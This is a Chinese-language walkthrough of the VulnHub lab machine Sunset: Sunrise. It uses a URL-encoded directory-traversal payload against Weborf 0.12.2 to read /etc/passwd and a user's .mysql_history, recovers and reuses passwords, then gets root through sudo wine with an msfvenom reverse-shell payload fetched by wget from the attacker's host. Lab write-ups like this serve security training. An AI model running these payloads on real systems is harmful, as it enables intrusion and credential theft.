PJzhang:vulnhub靶机sunset系列SUNSET:SUNRISE

猫宁~~~

地址：http://www.vulnhub.com/entry/sunset-sunrise,406/

关注工具和思路。

nmap 192.168.43.0/24
靶机IP
192.168.43.11

nmap -A -p1-65535 192.168.43.11

22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp open http nginx 1.14.2
3306/tcp open mysql
8080/tcp open http-proxy http-proxy Weborf (GNU/Linux)

http://192.168.43.11/
http://192.168.43.11:8080/，获知Weborf/0.12.2 (GNU/Linux)

Weborf/0.12.2存在目录遍历漏洞
https://www.exploit-db.com/exploits/14925

查看用户列表
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

关注
sunrise:x:1000:1000:sunrise,,,:/home/sunrise:/bin/bash
weborf:x:1001:1001:,,,:/home/weborf:/bin/bash

查看家目录，正好是上述两个用户
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2f

dirb http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf

如下可以访问
http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/.profile

http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/.mysql_history
显示ALTER USER 'weborf'@'localhost' IDENTIFIED BY 'iheartrainbows44';

http://192.168.43.11:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/.bashrc

ssh weborf@192.168.43.11，输入iheartrainbows44，进入

uname -a
Linux sunrise 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux

mysql -uweborf -p，密码还是iheartrainbows44

show databases;
use mysql;
show tables;
select Host,User,Password from user;

localhost | sunrise | thefutureissobrightigottawearshades

su sunrise，输入密码thefutureissobrightigottawearshades，sunrise@sunrise:/home/weborf$

sudo -l
获知(root) /usr/bin/wine

提权信息收集程序
https://github.com/sleventyeleven/linuxprivchecker

msfvenom -p windows/meterpreter/reverse_tcp -f exe --platform windows -a x86 -e generic/none lhost=192.168.43.154 lport=4444 >muma.exe

python3 -m http.server 80

进入靶机
wget http://192.168.43.154/muma.exe

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run

sudo /usr/bin/wine muma.exe
密码thefutureissobrightigottawearshades

直接获取shell
meterpreter >

cd /root
cat.root.txt
24edb59d21c273c033aa6f1689b0b18c

或者直接在靶机执行sudo /usr/bin/wine cmd.exe
cd /root
type root.txt
24edb59d21c273c033aa6f1689b0b18c